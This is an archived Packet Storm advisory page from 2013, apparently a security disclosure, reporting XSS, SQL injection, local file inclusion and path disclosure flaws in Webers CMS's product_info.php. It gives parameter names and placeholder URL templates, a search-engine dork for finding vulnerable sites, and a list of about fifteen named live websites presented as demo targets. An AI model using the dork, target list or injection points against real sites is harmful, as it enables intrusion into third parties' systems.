Twenty Year Anniversary

Webers CMS XSS / LFI / SQL Injection

Webers CMS XSS / LFI / SQL Injection
Posted Nov 6, 2013
Authored by Hossein Hezami

Webers CMS suffers from cross site scripting, local file inclusion, path disclosure, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, xss, sql injection, file inclusion
MD5 | 97b6de27d1ba58915658aff241611425

Webers CMS XSS / LFI / SQL Injection

Change Mirror Download
########################################################################
#
# Exploit Title: Webers CMS Multiple Vulnerability
# Date: 2013 5 November
# Author: Hossein Hezami ( Dr.3v1l )
# Vendor: http://www.webers.gr
# Version: All Version
# Security Risk: High
# Category: WebApps
# Google Keywords: intext:"created by Webers" site:gr
# Tested on: Linux
#
########################################################################
#
# [~] Exploit : XSS / SQL Injection / LFI / Path disclosure Vulnerability
#
# XSS : xss in product_info.php file => parametrs : lang , cPath , products_id
#
# http://<server>/product_info.php?cust_id=&template_id=&lang=gr[XSS]&cPath=[XSS]&template_id=website&cPath=[XSS]&from=sitemap&products_id=[XSS]
#
# SQL Injection : sql injection in product_info.php file => parametrs : lang , cPath , products_id
#
# http://<server>/product_info.php?cust_id=&template_id=&lang=gr[SQL-Injection]&cPath=[SQL-Injection]&template_id=website&cPath=[SQL-Injection]&from=sitemap&products_id=[SQL-Injection]
#
# LFI : lfi in product_info.php file => parametr : to
#
# http://<server>/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=[LFI]
#
# And To All Parametrs have "Path disclosure" ;)
#
########################################################################
#
# [~] Demo :
#
# http://bofrost.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123
# http://eyzein-aet.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123
# http://dellarte.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=3
# http://etiroll.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://forahellas.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://mete.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://ktirio3.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://e-fitnessclub.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=6_100_227&products_id=1578
# http://analycon.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://mavros.com.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=2
# http://normabox.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1
# http://fotiadis.com.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=2
# http://rbt.gr/website/product_info.php?template_id=38&lang=gr&cPath=&to=homepage.php
# http://iliosstudios.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=index.php
# http://oaveroias.gr/website/product_info.php?cust_id=&template_id=&lang=&cPath=&cPath=-2&from=sitemap&newid=all
#
########################################################################
#
# [~] Contact Me :
#
# Teacher.3v1l@live.com
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# IR.LinkedIN.com/in/Hossein3v1l
#
# http://0websecurity.ir
# Black_Devils B0ys
########################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close